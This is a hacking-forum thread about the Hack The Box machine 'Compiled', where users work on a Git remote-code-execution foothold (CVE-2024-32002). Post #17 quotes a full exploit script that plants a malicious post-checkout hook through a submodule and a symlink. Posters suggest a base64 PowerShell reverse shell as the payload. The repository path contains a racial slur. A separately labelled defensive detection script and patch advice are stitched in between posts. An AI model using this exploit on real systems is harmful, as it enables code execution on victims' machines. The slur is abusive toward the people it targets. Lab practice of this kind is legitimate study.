[HTB] Compiled
by UnkownWombat - Saturday July 27, 2024 at 07:07 PM
#11
(Jul 27, 2024, 09:05 PM)UnkownWombat Wrote:
(Jul 27, 2024, 08:58 PM)wtfduw Wrote: Any luck? I got nothing yet

No not yet ;/ i spent a ton of time trying to get the git rce to work but i can't seem to get it working

Same here. Have you checked this? https://amalmurali.me/posts/git-rce/

Reply
#12
(Jul 27, 2024, 09:11 PM)wtfduw Wrote:
(Jul 27, 2024, 09:05 PM)UnkownWombat Wrote:
(Jul 27, 2024, 08:58 PM)wtfduw Wrote: Any luck? I got nothing yet

No not yet ;/ i spent a ton of time trying to get the git rce to work but i can't seem to get it working

Same here. Have you checked this? https://amalmurali.me/posts/git-rce/

Yeah tried to get it working but thinking I'm doing something wrong.
Reply
#13
Looks like a CVE-2024-32002
Reply
#14
(Jul 27, 2024, 09:43 PM)spamdegratis5 Wrote: I think it's related to this https://github.com/cjm00n/EvilSln and here more info https://www.outflank.nl/blog/2023/03/28/...al-access/ (linked in the repo)
I haven't managed to obtain a rev shell yet in the box, but it works on my vm... I'm using PreBuild-Event btw (Project properties, Build Events)

u got now? ........

Reply
#15
damn this box looks so hard for me !!
Reply
#16
just throwing out a brainstorm, but think might need to host your own gitea instance, create a malicious .csproj file, and upload it to the compiling service running on the victim machine at port 5000

Reply
#17
(Jul 28, 2024, 04:15 AM)gihimlek Wrote:
(Jul 28, 2024, 03:35 AM)fuckhackthebox Wrote:
(Jul 28, 2024, 03:31 AM)gihimlek Wrote:
(Jul 28, 2024, 03:18 AM)fuckhackthebox Wrote: register and create empty repos on port 3000

#!/bin/bash

git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

rm -rf repo1
rm -rf repo2

git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git
cd repo1
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
PAYLOAD_HERE
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..

git clone http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo2.git
cd repo2
git submodule add --name x/y "http://gitea.compiled.htb:3000/celesian_nlte_cheating_niggers/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push

adjust accordingly

both repos need to be clean/empty

if you fuck it up then delete the repos recreate them and try again

Payload could be a simple "powershell -e base64revshell" ?

yeah

Nice!

how u got it work bro can u explain

Reply
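
Added example, not part of any post in this thread: a defender-side check for the tree shape the script quoted in #17 builds (a symlink entry "a" beside a submodule at "A/modules/x", which collide on a case-insensitive filesystem). It reads `git ls-tree -r` output; the function name and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Flag listings where a symlink entry (mode 120000) matches, ignoring case,
# a leading directory of a submodule/gitlink path (mode 160000).
# Input: `git ls-tree -r <rev>` lines, "<mode> <type> <oid>\t<path>".
# find_symlink_gitlink_collisions is a hypothetical helper name.
find_symlink_gitlink_collisions() {
    awk -F '\t' '
        {
            split($1, meta, " ")              # meta[1] = mode
            if (meta[1] == "120000") symlink[tolower($2)] = $2
            else if (meta[1] == "160000") gitlink[++n] = $2
        }
        END {
            for (i = 1; i <= n; i++) {
                # Walk every leading directory of the submodule path.
                parts = split(gitlink[i], seg, "/")
                prefix = ""
                for (j = 1; j < parts; j++) {
                    prefix = (j == 1) ? seg[j] : (prefix "/" seg[j])
                    key = tolower(prefix)
                    if (key in symlink)
                        printf "%s\t%s\n", symlink[key], gitlink[i]
                }
            }
        }
    '
}

# Constructed sample listing: gitlink at A/modules/x next to a symlink "a".
sample_listing() {
    oid=0000000000000000000000000000000000000000   # placeholder object id
    printf '%s %s %s\t%s\n' \
        100644 blob   "$oid" .gitmodules \
        160000 commit "$oid" A/modules/x \
        120000 blob   "$oid" a \
        100644 blob   "$oid" README.md
}

# Prints one "<symlink>\t<submodule path>" line per collision.
sample_listing | find_symlink_gitlink_collisions
```

On a real checkout, feed it `git ls-tree -r HEAD` before running anything with `--recurse-submodules`. CVE-2024-32002 is fixed in Git 2.45.1 and the backported releases 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 and 2.39.4, and `git config --global core.symlinks false` blocks the symlink step on clients that cannot be upgraded yet.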
#18
I found a file called "pwnd"; it's called pwnd so it has to do something somewhere maybe?

Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd

ruycr4ft_was_here
Reply
#19
(Jul 28, 2024, 04:19 AM)gihimlek Wrote:
(Jul 28, 2024, 04:17 AM)osamy7593 Wrote:
(Jul 28, 2024, 04:15 AM)gihimlek Wrote:
(Jul 28, 2024, 03:35 AM)fuckhackthebox Wrote:
(Jul 28, 2024, 03:31 AM)gihimlek Wrote: Payload could be a simple "powershell -e base64revshell" ?

yeah

Nice!

how u got it work bro can u explain

Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want

did you get it back on a certain port or smthg, confused as to what I'm doing wrong here, did manually and by script

(Jul 28, 2024, 05:50 AM)maggi Wrote: I found a file called "pwnd"; it's called pwnd so it has to do something somewhere maybe?

Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd

ruycr4ft_was_here

i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,

could you give me a nudge on shell please
Reply
#20
(Jul 28, 2024, 06:30 AM)jimmyshoemacher Wrote:
(Jul 28, 2024, 06:17 AM)UnkownWombat Wrote:
(Jul 28, 2024, 04:19 AM)gihimlek Wrote:
(Jul 28, 2024, 04:17 AM)osamy7593 Wrote:
(Jul 28, 2024, 04:15 AM)gihimlek Wrote: Nice!

how u got it work bro can u explain

Basically instead of running the script, do it manually, step by step (may need to fix some errors on the way to properly work) and changing the payload for one that you want

did you get it back on a certain port or smthg, confused as to what I'm doing wrong here, did manually and by script

(Jul 28, 2024, 05:50 AM)maggi Wrote: I found a file called "pwnd"; it's called pwnd so it has to do something somewhere maybe?

Richard@COMPILED MINGW64 /c/users/Richard/AppData/Local/Temp
$ cat pwnd

ruycr4ft_was_here

i think someone probably left this, or there was also an rce git exploit that used this 'x was here format' as the payload so maybe someone got one of those working,

could you give me a nudge on shell please

i have this on a vip machine too w/e it is was left there by creator but I explored some of it and I didn't find anything yet. Might just be nada

i've tried like 4 different methods for the foothold RCE and on ports 443 and 4444, any thoughts?
Reply

